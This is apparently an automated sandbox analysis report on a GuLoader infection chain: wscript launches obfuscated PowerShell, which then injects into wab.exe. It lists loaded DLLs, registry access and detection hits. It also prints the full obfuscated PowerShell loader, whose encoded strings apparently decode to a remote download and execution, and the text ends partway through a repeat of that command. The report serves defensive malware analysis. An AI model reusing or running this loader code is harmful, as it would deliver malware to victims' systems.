            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb| source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2679909580.000000000776C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb>vkv source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 00000005.00000002.2679909580.00000000077AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb' source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 source: powershell.exe, 00000005.00000002.2679909580.00000000077AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2673226502.0000000003340000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate(", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 0000000B.00000002.3597768413.0000000004720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2686037167.0000000009DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2685556300.0000000008A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2677071576.0000000005FE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2841439577.0000015930831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Reevidence)$global:Dyreparken = [System.Text.Encoding]::ASCII.GetString($Adrenalectomy)$global:Rutted172=$Dyreparken.substring(294928,26987)<#Improvisatorer Excerpting Megaptera Blin
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Foisting $Quests $Ankenvnenes), (Kraftfuldheds @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Arrimby = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Filliped122)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Gorillaens, $false).DefineType($Steamvortex,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Reevidence)$global:Dyreparken = [System.Text.Encoding]::ASCII.GetString($Adrenalectomy)$global:Rutted172=$Dyreparken.substring(294928,26987)<#Improvisatorer Excerpting Megaptera Blin
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon 